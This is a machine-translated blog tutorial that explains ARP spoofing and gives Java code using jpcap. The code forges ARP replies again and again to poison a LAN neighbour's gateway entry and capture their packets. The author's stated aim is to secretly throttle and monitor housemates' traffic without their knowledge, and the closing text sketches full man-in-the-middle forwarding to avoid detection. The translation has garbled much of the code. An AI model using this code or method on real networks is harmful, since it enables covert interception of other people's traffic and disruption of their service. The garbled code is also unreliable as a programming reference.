Implement ARP spoofing data packet monitoring in Java
Text/rexcj source/blogjava
Transferred from:
Http://www.pin5i.com/showtopic-18934.html
If there is something unpleasant recently, it is the pain of sharing networks with people, especially when other sharing users use those P2P tools to download software, but you watch the Web progress bar crawling a little bit, that kind of pain is hard for people like me who are at the insect level. I can't bear it anymore. It's just like downloading P2P Terminator online. Well, if you don't trust me, I don't mean anything. After the software is ready, immediately start monitoring, and then try the speed. Wow, that is awesome. Unfortunately, it was not long before the other party came to ask me why they broke the network? I stunned, and the spam software broke the network of the other party, so I refused to handle him. I said that I was barely able to pass the test. Fortunately, they didn't understand the computer, otherwise, it would be too big (the appearance is quite mean, don't BS, I am also forced ).
No way, the broken software is disconnected from the internet. I just want to speed them up (it's still a bit of a conscience). I checked the document carefully and it's okay to use it, why? I had no clue after thinking about it for a long time. I couldn't help it. It seems that I had to do it myself. So I went online and found some information about it. I also wrote some code for testing, due to the limited time, I only wrote a little bit, but the general practice is probably to have some understanding. Here I will write an article to record my own practice, in order to serve as a diary, you can share it with the public.
In fact, software such as p2p Terminator on the network is mainly implemented Based on ARP spoofing, and ARP spoofing is introduced everywhere on the network. However, for the sake of this article, readers do not need to look for it again, I will give a rough explanation here.
Address Resolution Protocol (ARP) is an address interpretation protocol mainly used for IP and MAC address interpretation. IP is the network layer protocol, while Mac is used by the data link layer. To communicate with two nodes in the network, the sender must first know the MAC address of the source and destination, while the network layer uses the IP address. Therefore, you need to obtain the MAC address, you must obtain the corresponding MAC address through the IP address, so you need to use ARP to convert the IP address to the MAC address, and in order to quickly find the MAC address of the destination, each node has an ARP cache to store the converted MAC address. You can use the ARP-a command on the console to view the ARP cache table.
The specific ARP process is to obtain a remote MAC address through an IP address, the system first checks whether the corresponding IP address exists in the ARP table. If not, an ARP broadcast is sent, when a node with this MAC address receives an ARP request, it creates an ARP reply packet and sends it to the source node of the ARP request, the ARP reply package contains the MAC address of the destination node. After the source node receives the reply, the MAC address of the destination node is saved in the ARP cache table, when you request the same IP address again, the system will directly obtain the destination MAC address from the ARP table without sending the ARP broadcast again.
Here, the specific process of ARP is roughly explained, and I hope it can be explained clearly. I believe that some interested friends have already begun to consider the principle of ARP spoofing. In fact, they are using ARP tables for ARP spoofing. For example, a machine in a LAN is connected to the Internet through gateway B, its ARP table stores the IP address and MAC address pairs of gateway B, as shown below:
192.168.1.1-> mac1 (It's too long to write, so mac1 serves as the MAC address)
That is to say, when a wants to access the Internet, all his data will be first sent to the gateway and then forwarded by the gateway. Then a's data will first find the gateway's MAC address mac1 through 192.168.1.1, then you can send the data to the gateway. At this time, your machine is C and the MAC address is mac2. If you want to get the data transmitted by a through ARP spoofing, what you need to do is actually very simple, change the MAC address mac1 corresponding to 192.168.1.1 In the ARP table of machine A to mac2. In this way, all data sent from machine A to 192.168.1.1 will be sent to the machine whose MAC address is mac2, that is, your machine is on.
To change the records of the APR table, you can forge an ARP reply package and send it to machine A. the source IP address in this ARP reply package is 192.168.1.1, the MAC address is mac2, which is the MAC address of your machine. After receiving the MAC address, machine A will refresh the source IP address and MAC address to its ARP cache table to overwrite the original record, in the end, ARP spoofing can be achieved.
I don't know if you know about ARP spoofing? If you do not know more about it, search for it online, and search for a lot of relevant information on the Internet. Well, after the principle is finished, it's the turn to implement it. How can we implement ARP spoofing through Java?
From the beginning to the end, of course not my style. the Java Community is so huge that I should make good use of it and stand on the shoulders of giants for success. There is an open-source project jpcap, which provides an intermediate layer interface for users to call libraries such as wincap and libpcap to control network transmission. For details, visit the official website.
Here, I implemented a simple packet interception program. According to the principle of ARP spoofing, what we need to do is as follows:
1. Build an ARP reply package
2. Send the packet to the machine to be spoofed.
The Code is as follows:
Code
[Copy to clipboard] Code:
Public class locallistener {
Private Final Static string gate_ip = "192.168.11.1 ";
Private Final Static byte [] gate_mac = {0x00, 0x0a, (byte) 0xc5, 0x42, 0x6e, (byte) 0x9a };
Private jpcapcaptor jpcap; // connection to the device
Private jpcapsender sender; // instance for sending
Private packet replypacket; // ARP reply package
Private networkinterface device; // The NIC device of the Current Machine
Private ipmacmap targetipmacmap; // the MAC address of the destination IP address.
Public locallistener (ipmacmap target) throws exception {
Networkinterface [] devices = jpcapcaptor. Getdevicelist (); device = devices [1];
This.tar getipmacmap = target;
Initsender ();
Initpacket ();
}
Private void initsender () throws exception {
Jpcap = jpcapcaptor. opendevice (device, 2000, false, 10000); // open the connection to the device
Jpcap. setfilter ("ip", true); // only listens to IP Packets
Sender = jpcap. getjpcapsenderinstance ();
}
Private void initpacket () throws exception {
// Source IP and MAC address of the reply package, which will be mapped to the ARP table
Ipmacmap targetssd = new ipmacmap (gate_ip, device. mac_address );
// Create a packet for modifying the ARP of the target machine
Replypacket = arppacketgern. genpacket (targetipmacmap, targetssd );
// Create an Ethernet header and package it into the reply package
Replypacket. datalink = ethernetpacketgern. genpacket (targetipmacmap. getmac (),
Device. mac_address );
}
Public void listen () throws interruptedexception {
Thread t = new thread (New runnable (){
Public void run (){
// Send the reply packet and modify the destination ARP table. The ARP table will be updated within a period of time, so you need to keep sending
While (true ){
Send ();
Try {
Thread. Sleep (500 );
} Catch (interruptedexception ex ){
Logger. getlogger (locallistener. Class. getname (). Log (level. Severe, null, ex );
}
}
}
});
T. Start ();
// Intercept packets sent and received by the current network device
While (true ){
Ippacket = (ippacket) jpcap. getpacket ();
System. Out. println (ippacket );
}
}}
// IP-MAC entity, used only to save a pair of IP-MAC addresses
Public class ipmacmap {
Private string IP;
Private byte [] Mac;
Public ipmacmap (){
}
Public ipmacmap (string IP, byte [] Mac ){
This. IP = IP;
This. Mac = MAC;
}
Public String getip (){
Return IP;
}
Public void setip (string IP ){
This. IP = IP;
}
Public byte [] getmac (){
Return MAC;
}
Public void setmac (byte [] Mac ){
This. Mac = MAC;
}
}
// ARP reply package generation class, used to generate a reply package based on the destination address and Source Address
Public class arppacketgern {
Public static arppacket genpacket (ipmacmap target, ipmacmap sender) throws exception {
Arppacket arptarget = new arppacket ();
Arptarget. hardtype = arppacket. hardtype_ether; // select the Ethernet type)
Arptarget. Prototype = arppacket. prototype_ip; // select the IP protocol type.
Arptarget. Operation = arppacket. arp_reply; // select the reply type.
Arptarget. hlen = 6; // the MAC address length is fixed to 6 bytes.
Arptarget. Plen = 4; // the IP address length is fixed to 4 bytes.
Arptarget.tar get_hardaddr = target. getmac ();
Arptarget.tar get_protoaddr = inetaddress. getbyname (target. getip (). getaddress ();
Arptarget. sender_hardaddr = sender. getmac ();
Arptarget. sender_protoaddr = inetaddress. getbyname (sender. getip (). getaddress ();
Return arptarget;
}
}
// Creates an Ethernet header Based on the destination MAC address and the source MAC address for data transmission.
Public class ethernetpacketgern {
Public static ethernetpacket genpacket (byte [] targetmac, byte [] sendermac) throws exception {
Ethernetpacket ethtotarget = new ethernetpacket (); // create an Ethernet header
Ethtotarget. frametype = ethernetpacket. ethertype_arp; // select the Ethernet package type.
Ethtotarget. dst_mac = targetmac;
Ethtotarget. src_mac = sendermac;
Return ethtotarget;
}
}
The above Code creates an ARP reply packet sent to the machine whose IP address is 192.168.11.4. You can see that the source IP address in the reply package is 192.168.11.1, the source MAC address is changed to the MAC address of the current machine, that is, device. mac_address. When the machine at 192.168.11.4 receives the reply packet, the ARP table is refreshed and all data sent to 192.168.11.1 is actually sent to the machine running the program. A thread is created in the program to send reply packets cyclically, mainly because the ARP table will be updated within a certain period of time, so it is necessary to keep sending to ensure that its MAC address is changed at all times. At the same time, the main thread is used to listen to and print all IP packet information of the current device. Originally, this method can only listen to the information of local packets, but due to ARP spoofing, therefore, when sending data to 192.168.11.1 at 192.168.11.4, you will intercept the data packet and see information similar to the following:
1216798614: 885583/192 .168.11.4->/61.135.189.33 protocol (6) priority (0) Hop (128) offset (0) Ident (34922) TCP 1337> 8016 seq (1062321893) Win (65535) s
In fact, although the program in the above example can intercept and listen to packets of 192.168.11.4, if it runs, the machine of 192.168.11.4 will not be able to access the Internet (assuming that the machine uses 192.168.11.1 as the gateway to access the Internet ), why?
This is because the local machine intercepts the packet of 192.168.11.4, but does not forward the packet, so the packet is actually interrupted after it reaches your machine, and the packet cannot be sent out. Since you want to listen to the other machine, you certainly cannot let the other party know. If you listen to the machine, the other party will not be able to access the Internet, therefore, the above program still needs to add a supplement, that is, to forward the packet data to 192.168.11.1, as long as the intercepted packet is sent out again, you can leave it for everyone to think about how to do it, sleepy and rested. If you have any friends who are interested and cannot figure out how to do it, you can ask me. If necessary, I will post a complete example next time.
By the way, we can refresh the ARP of the Gateway in the same way, so that the data received by the gateway will be intercepted by the local machine, you can also forward the data to the target machine through the local machine. In this way, the other party can access the Internet normally, while we can intercept the other Party's data packets. If we want to speed up the packets, we can intercept the packets and perform a certain delay, for example, the number of K data records allowed in one second can all be used here. Similarly, let's leave it to everyone, ^ o ^.
Thank you for your hard work and hope to help you.